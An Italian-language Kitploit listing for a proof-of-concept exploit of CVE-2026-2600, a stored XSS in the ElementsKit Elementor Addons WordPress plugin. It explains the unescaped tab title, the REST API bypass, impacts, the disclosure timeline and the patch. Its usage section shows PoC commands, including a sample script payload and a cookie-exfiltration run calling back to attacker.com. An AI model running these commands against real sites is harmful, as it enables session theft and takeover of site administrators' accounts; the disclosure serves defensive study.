Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-2600-POC — Proof-of-concept exploit per CVE-2026-2600, una XSS persistente in ElementsKit Elementor Addons <= 3.7.9, che consente a Contributor autenticati di iniettare script arbitrari tramite dati Elementor appositamente predisposti. | Kitploit
Strumenti/GitHubGitHub/folks-iwd/cve-2026-2600-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

Proof-of-concept exploit per CVE-2026-2600, una XSS persistente in ElementsKit Elementor Addons <= 3.7.9, che consente a Contributor autenticati di iniettare script arbitrari tramite dati Elementor appositamente predisposti.

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — Cross-Site Scripting Stored autenticato (Contributor+)

CVSS6.4 MEDIO
Versioni interessate<= 3.7.9
Corretta in3.8.0
Ruolo minimoContributor (edit_posts)
VettoreRete / Bassa complessità / Privilegi bassi

Il bug

Il widget Simple Tab visualizza i titoli delle schede con HTML emesso tramite echo ma senza escaping dell'output. In widgets/tab/tab.php, il ciclo di rendering esegue:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

L'editor di Elementor sanifica l'input lato client, ma l'endpoint dell'API REST (/wp-json/wp/v2/posts/{id}) accetta direttamente il campo meta _elementor_data e bypassa completamente quel livello.

Un Contributor autenticato può inviare una richiesta PATCH a un post con un payload JSON di Elementor appositamente costruito che imposta ekit_tab_title su HTML arbitrario. Poiché il valore viene memorizzato verbatim in _elementor_data e viene emesso senza esc_html() al momento del rendering, lo script viene eseguito nel browser di ogni visitatore al caricamento della pagina.

Impatto

Qualsiasi Contributor può:

  • Rubare i cookie di sessione e i token di autenticazione di tutti i visitatori del sito, inclusi gli amministratori
  • Dirottare gli account admin e scalare fino alla completa compromissione del sito
  • Distribuire silenziosamente keylogger o overlay per il furto di credenziali
  • Reindirizzare i visitatori verso pagine di phishing o siti di distribuzione di malware
  • Deturpare le pagine in modo persistente — il payload sopravvive finché non viene rimosso manualmente

Al momento della divulgazione erano interessate oltre 400.000 installazioni attive.

Utilizzo

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

Lo script si autentica su HTTP, recupera il nonce REST dall'editor admin, crea un post bozza, applica una PATCH a _elementor_data con il payload XSS incorporato nel campo ekit_tab_title e pubblica il post. L'output conferma se il payload è attivo nel sorgente della pagina.

root@kitploit:~
# Payload personalizzato
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# Esfiltrazione dei cookie con callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Modalità console interattiva
python3 console_poc.py

Writeup completo

https://folks-iwd.github.io/writeups/cve-2026-2600.html

Cronologia della divulgazione

DataEvento
Gennaio 2026Scoperta tramite revisione dei diff SVN. PoC confermato.
Gennaio 2026Segnalato a Patchstack Alliance con writeup completo e PoC.
Marzo 2026Wpmet ha rilasciato la correzione nella v3.8.0.
Aprile 2026Pubblicato CVE-2026-2600. Assegnato CVSS 6.4 MEDIO.

La patch

Wpmet ha aggiunto esc_html() attorno all'output del titolo della scheda in widgets/tab/tab.php:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
Scarica lo strumento